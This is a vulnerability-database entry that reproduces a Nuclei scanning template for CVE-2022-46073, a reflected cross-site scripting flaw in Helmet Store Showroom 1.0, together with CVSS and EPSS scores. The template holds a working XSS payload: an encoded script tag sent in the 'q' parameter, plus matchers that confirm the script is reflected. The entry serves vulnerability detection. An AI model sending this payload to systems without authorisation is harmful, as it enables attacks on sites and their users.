Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-46073
HistoryJun 30, 2023 - 12:48 p.m.

Helmet Store Showroom - Cross Site Scripting

2023-06-3012:48:15
ProjectDiscovery
github.com
cve2022
xss
helmet_store_showroom_project
web
security
scripting

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

40.5%

Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).
id: CVE-2022-46073

info:
  name: Helmet Store Showroom - Cross Site Scripting
  author: Harsh
  severity: medium
  description: |
    Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://yuyudhn.github.io/CVE-2022-46073/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46073
    - https://www.youtube.com/watch?v=jT09Uiwl0Jo
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-46073
    cwe-id: CWE-79
    epss-score: 0.00094
    epss-percentile: 0.39756
    cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: helmet_store_showroom_project
    product: helmet_store_showroom
  tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Helmet Store Showroom")'
          - 'contains(body, "><script>alert(document.domain)</script>")'
        condition: and
# digest: 4a0a00473045022041a2e647421ab3a844ec1c371106d0ec3db2a0029f268b16732bfc3be590cd170221009c5847c2b2ce43c8f05a86525d82f698c4b917632335d94abd441ebbaab49947:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

40.5%

Related for NUCLEI:CVE-2022-46073